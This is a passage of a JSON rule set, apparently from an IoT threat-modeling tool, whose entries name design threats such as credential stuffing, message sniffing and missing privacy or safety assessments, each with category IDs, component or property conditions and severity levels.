algorithms","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"AttackVectorID":"a0729a41-bcc9-43d8-9c86-bfb26c64e93c"},"overridenRuleIDs":[],"RuleType":4,"ProtocolRestriction":{"protocolID":"f805dd78-eac2-4967-8dfc-231605a75ace","DetailRestrictions":[]},"Severity":2},{"ID":"b76247eb-309c-4fad-9a8c-28fea0a98555","Name":"Exposure of personal information","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"7dc1eb8e-2312-4b2f-becf-f9725d45cdce","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"dffbfc0a-850b-4de0-95fb-ab9ea4273d88","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"13649f62-1bd6-4b50-9646-a9df988262a5","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"b9b2fbaa-be5c-48ca-bddc-6d4cb5989f96","Name":"Human injury","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f2ba26f4-b2da-49a8-aba2-14e42a746d6a","17a04fbd-365f-4345-97f8-88d3c7382ec1"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"5deb66fa-ff3e-49b6-b0d2-66a39708d259","DetailRestrictions":[]},"Severity":3},{"ID":"7892b860-7ed4-4109-ae03-3c290271fef6","Name":"User unawareness of data collection","Description":"Personal information such as talks, coughs, etc. is exposed and processed by an external system","IsActive":true,"RuleGenerationType":3,"Mapping":{"AttackVectorID":"7742f998-ab1e-4f64-8ac6-12b3f97b936a","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","aead4d1d-0f64-42b4-a512-cbbc979af3ca","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":true,"Target":0,"NodeTypes":[{"TypeIDs":["4b7a61d0-c430-48ea-8730-03a81542a5d8"]},{"TypeIDs":[]}],"NodeRestrictions":[]},"Severity":2},{"ID":"ba71d0ae-0a71-40d5-a3e3-f15c3a3baa2b","Name":"Location Tracking","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["61d04f2d-83b1-4152-9aba-4ad188eef06d","2765e61e-29a9-498e-adf8-4d653f488e3d","5278c995-f9d9-410e-b012-2995ba30c353","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"2460a6c9-40e5-44c7-b133-10c6654efd18","DetailRestrictions":[]},"Severity":2},{"ID":"b05b7085-3952-4f0d-bb85-7c380eb32f92","Name":"Full-scale outage","Description":"A full-scale outage may cause the solution to be unavailable for its users. This may be caused by natural events but also by a malicious actor.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"8f9a24d4-e962-4136-b0ec-8e9f797a6f62","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"0a168b12-fc9a-411c-bbf0-59599d0181f8","DetailRestrictions":[]},"Severity":3},{"ID":"8d604765-2981-4a70-9cb0-9569411503cc","Name":"Attackers may be undetected","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f","f2b91aaf-7d9f-4baf-8713-13d7625174d9"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"4a5bbdcf-ef9a-49cb-ac4c-a05dcefd95d2","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6e0c2499-9e6b-42da-8e9c-c34d40fca0db","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"2b0c94a0-f2c7-4068-86e4-2d5f7ed3fe94","Name":"Credential cracking","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"296e95fe-e06d-4ae3-be84-da98df4a122c","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"45244917-e4a2-4b03-89de-f18e9ddcad3f","DetailRestrictions":[]},"Severity":2},{"ID":"2c32278f-ea97-4aa1-8e85-982f76dee1b9","Name":"Credential stuffing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"0217b20a-5e3a-4244-8dce-819e28050a47","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"45244917-e4a2-4b03-89de-f18e9ddcad3f","DetailRestrictions":[]},"Severity":3},{"ID":"a777fa41-a13f-4225-af47-e4458a0c8f9e","Name":"Password spraying","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"1909127e-50bd-4892-8b1f-1a2123a4fa61","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"45244917-e4a2-4b03-89de-f18e9ddcad3f","DetailRestrictions":[]},"Severity":3},{"ID":"ab670c99-4f5c-41c7-974c-a6704df1661b","Name":"Unsecure default settings","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"e060675a-41d0-4c4d-9e16-311bb4adec7b","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"9ebe3a8f-eedb-40cd-9cbf-d1012a1829e2","DetailRestrictions":[]},"Severity":2},{"ID":"ab1d49fc-cb77-46cf-aeff-b4a28eb0d692","Name":"Undetected misuse of API","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"b125fa52-c06e-4e54-88b5-5e9d3929f643","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"e014189e-5d3c-40c7-aac2-23202be3ccd4","Name":"Unsecure management access","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44545d3e-fa0a-44c7-a19e-8164dab646dc","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6962d897-bf88-4745-9f2c-a8aa9d981f93","ComparisonType":"==","Value":false}}]},"Severity":4},{"ID":"a89ed38a-c36b-445b-a8c2-89e7289cdb9e","Name":"Message sniffing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"e58fcbde-e429-4704-9f22-c00d187994bc","ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"693eb3c8-9d8a-42ce-91aa-0ac4c190d7dc","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6d7716ae-9870-46a1-9231-a713a0dcd5a0","ComparisonType":"==","Value":false}}]},"Severity":4},{"ID":"104ac1d9-34d6-4ce7-97f1-6d3dedcfbb59","Name":"Client spoofing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"d46f6e31-ae41-4d6e-93fc-0e6c3bbb295d","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"693eb3c8-9d8a-42ce-91aa-0ac4c190d7dc","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"de628891-642c-4b7c-b88b-abf7988721dc","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"2b82faea-2950-430d-8b52-273d9b0320e2","Name":"No privacy impact assessment","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"8f4a0dd3-2083-42eb-89bd-48480a082342","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"eaee9e9f-c3d7-42d7-9f8a-3d538cb9a17e","Name":"Outdated privacy impact assessment","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f3d756ae-7451-4738-986c-0e15d22cb2b2","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"03778e71-e9a1-4528-b1db-547990486b27","Name":"No safety impact assessment","Description":"Evaluate the safety impacts of an IoT system, log all safety risks, prioritize the risks, and implement mitigations for each risk. Incorporate device and environmental controls to enforce safety requirements, as necessary","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["17a04fbd-365f-4345-97f8-88d3c7382ec1"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"be1f1524-fd62-4957-a08d-844b070dbb00","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"a1e7923f-848d-4532-b967-700925af1a77","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"359293f9-3fe1-4b61-99cb-332809add1f5","Name":"No fault tree analysis","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["17a04fbd-365f-4345-97f8-88d3c7382ec1"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"be1f1524-fd62-4957-a08d-844b070dbb00","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"d0e4fa19-2b29-48b3-b81b-2be909af26d8","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"60b7ed0a-97b4-4904-a3bf-6d3ebdf01954","Name":"No account management","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"23a8870f-e7f4-4e07-80be-8cb890f509e8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"524e227d-483e-45ae-b002-3041d15fe7e9","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"65c95996-5153-4f47-a7cd-0ffe05f96309","Name":"Weak authentication","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"23a8870f-e7f4-4e07-80be-8cb890f509e8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"330a4f44-1471-460d-889f-4f33a3b8ce72","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"23c52b69-1923-416b-99a4-620d36961365","Name":"Root privileges","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c8a14b27-b13f-4358-9f3f-691d01c97c77"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"39de06c5-7cfc-4fb8-8a1f-22a8888cf4ed","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"d0a3fe39-6894-44c5-91ec-1f1019ffda37","Name":"Certificates with long lifetime","Description":"Device certificates may be used without expiration. In this case, short-term operational certificates should be established.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"40c05808-37a1-4394-a9d5-8491b55c3a9b","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"fdc27962-5622-47e7-8de8-ca1b60009276","Name":"No revocation process","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","b1ff0675-f9b7-4ffb-bdd5-f621c6580d9a"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"083e93ef-da95-4064-a698-6fbd5cf997f5","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"d0bd34ae-02d2-46e9-b45a-0130be9713c4","Name":"No management policy","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"46d35b81-19e3-404e-9fe2-af5088971ffe","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"662c14ed-b7cf-490a-97b8-978836d022bb","Name":"No automated renewal process","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","b1ff0675-f9b7-4ffb-bdd5-f621c6580d9a"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"0c0d40fd-7f0a-412d-ae80-efce58906308","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"2d55c643-21db-426a-be29-d21f7f1965a4","Name":"No incident response team","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"263b5363-2c09-45dd-8ff8-1a430fb7e93a","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"3c1166bd-b978-4361-9846-33cd050dd968","Name":"No supply chain risk management program","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2c884e0a-ab3c-43f7-95c7-f4a320e8bbe1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"7e3faca4-9b7a-4f8e-8fbe-cb461ca6870f","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"42b3d570-e03c-440d-b7a4-87614c6b2e2c","Name":"Risks from third party components","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2c884e0a-ab3c-43f7-95c7-f4a320e8bbe1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"2614fc88-29cb-4d84-9902-5f7ca7f98410","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"d54bae32-33ff-4b3a-b583-07b53b4c947b","Name":"No regular penetration tests","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8902950a-6c5e-426b-baa2-71794e74f720","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"d4cb3498-4689-49f2-9f37-8bd45e62a972","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"58d38f0f-82b4-4ecb-a95f-237adcfcb58c","Name":"Missing privacy measures","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["180a9034-735c-44ca-a96a-693cb48ffaa7","1180824d-9f8a-4a4a-8398-3775c541a360","2521b219-3d43-4fd8-bf96-d658eea44d01","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"2a4c8bb7-bd16-4eee-847f-25090eac2d7e","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"cf9cef5a-3e4e-47cd-aa03-22522a1ce3e9","Name":"Privacy law compliance","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["180a9034-735c-44ca-a96a-693cb48ffaa7","1180824d-9f8a-4a4a-8398-3775c541a360","2521b219-3d43-4fd8-bf96-d658eea44d01","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"1bd8c924-5f59-42db-a9b2-a4527c46adf2","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"ae2e4063-13cd-414e-811d-3d114365f85f","Name":"User rights and freedoms violation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["180a9034-735c-44ca-a96a-693cb48ffaa7","1180824d-9f8a-4a4a-8398-3775c541a360","2521b219-3d43-4fd8-bf96-d658eea44d01","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e79dc2a3-1af9-4a37-b649-9db68eacfc9f","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"db9dfe37-7599-4257-a425-e4948ffb8618","Name":"Insufficient user awareness","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["180a9034-735c-44ca-a96a-693cb48ffaa7","1180824d-9f8a-4a4a-8398-3775c541a360","aead4d1d-0f64-42b4-a512-cbbc979af3ca","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"2dd7688c-eddf-4cfa-a496-8c1a46963c89","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"4c2aaafd-3248-4b30-b011-cddef8e75876","Name":"Missing opt-in mechanism","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["180a9034-735c-44ca-a96a-693cb48ffaa7","1180824d-9f8a-4a4a-8398-3775c541a360","2521b219-3d43-4fd8-bf96-d658eea44d01","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"d9b40dd2-e5eb-485d-9cf5-db2ac441c899","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"c68e523a-cba1-41b2-95ce-c8d634fd4396","Name":"Missing SDL program","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e1cdca4d-c2a2-48a1-be0e-93af41cd458c","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"a40575c4-b39f-4c9e-a4cb-3e15e3f27777","Name":"Missing responsibility for regulatory compliance","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"9db73879-4ec7-46ae-a8d9-1b555aac6954","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"8825c214-9562-4a85-8538-a0530d2b79ee","Name":"Missing responsibility for security compliance","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f3a7b4b7-2ff8-45e8-be0e-321f8d9304a1","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"ef631565-02d7-4f52-a80b-e615224409df","Name":"Missing responsibility for auditing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"8fda48d4-746b-4915-b0d2-55c9b68fbd99","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"61c1d062-4c94-4af4-bd64-26a632462653","Name":"Missing testing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e6f155e1-51e1-4297-80d9-a6a3beef3657","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"ca3e9dda-cb0d-4f16-8b14-d0b11e4210cb","Name":"Missing trusted execution environment","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"22e9ef37-20a4-4b6c-ba68-ecc90f1d152f","ComparisonType":"==","Value":false}}]}},{"ID":"88d04fe9-ac62-4371-89d3-89471ac13027","Name":"Missing isolation of cryptographic operations","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"28c99516-8651-452e-86f7-ce00df632c8d","ComparisonType":"==","Value":false}}]}},{"ID":"d5c0c703-75c1-42dd-a0d0-ca114eb7cdb4","Name":"Decryption of recorded traffic","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6cce79b8-3df2-4eda-8892-e83b6a2ee603","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"9c362082-55b7-4c48-ac28-e381f5f38a2d","Name":"No external audit","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8902950a-6c5e-426b-baa2-71794e74f720","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"5f7c116c-e2a5-49af-bfd6-9c38541b6a77","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"b634e0fe-6f3f-4c75-9df4-98f589d3a3f0","Name":"Missing employee training and awareness","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"976c15a1-9170-4a2b-a41c-f1dfb4688b1e","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"a05007e9-ca76-4584-a7be-47cf4a9625c4","Name":"No regular employee training","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f2e2201c-bd33-4dbd-a8ca-1f3a6d16eb9f","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"f424f4d3-b3c2-4718-8c5f-ec9b3b6eef74","Name":"No secure coding guidelines","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"60fadd09-661b-494a-bcac-f0a652172a50","ComparisonType":"==","Value":false}}]}},{"ID":"1a54b8f3-ecd6-4704-9f6c-e05b7e948548","Name":"Missing end of support date","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ec622fb4-b851-4c4f-94dc-d5f5b1a6f85d","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"105910c0-a5b5-4496-a2f7-99f11422e4b0","Name":"Missing update interval information","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"53ceef04-26a6-46a6-834d-bb9c0df2a24d","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"8f8d0183-5a29-451a-bb84-df061c0728d4","Name":"Missing update notification","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"7da73f3c-b3f6-4d35-ae19-c60ed655b14c","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"d406176c-9381-4f8c-aecc-b6d7ba56c7da","Name":"Full-scale outage","Description":"A full-scale outage may cause the solution to be unavailable for its users. This may be caused by natural events but also by a malicious actor.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"8f9a24d4-e962-4136-b0ec-8e9f797a6f62","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"6f4e4f07-79e0-4f16-b447-dbc325b42e91","DetailRestrictions":[]},"Severity":2},{"ID":"ea3713af-49ae-4069-8353-78141725af6f","Name":"Missing time synchronization","Description":"A synchronized system time is necessary to correctly create and subsequently analyze logs.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c17cbe5c-3210-42fc-be1e-05f1f915865b"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"8643278b-1ab3-4359-9ab9-f3911bf336e6","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"1221dc8c-f495-4833-a027-c3c5d2dc1a7d","Name":"Collision attack","Description":"Attackers who can send a series of packets or messages may be able to overlap data. For 